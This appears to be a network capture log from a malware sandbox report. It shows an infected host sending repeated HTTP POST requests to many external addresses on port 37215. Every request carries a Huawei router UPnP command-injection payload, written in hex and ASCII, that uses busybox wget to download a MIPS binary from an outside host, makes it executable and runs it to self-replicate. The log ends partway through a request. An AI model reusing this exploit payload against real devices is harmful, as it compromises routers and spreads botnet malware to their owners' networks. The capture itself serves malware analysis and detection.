                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1561192.168.2.154297641.178.84.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.908483982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1562192.168.2.1559564204.213.29.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.909104109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1563192.168.2.1544080157.212.105.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.909230947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1564192.168.2.1542718157.96.119.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.909883022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1565192.168.2.1549076157.233.198.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.909929991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1566192.168.2.154002241.24.19.9437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.909929991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1567192.168.2.154256254.139.39.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.913996935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1568192.168.2.154548641.211.187.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.914017916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1569192.168.2.1536350197.230.32.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.914335966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1570192.168.2.1559890197.170.89.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.915334940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
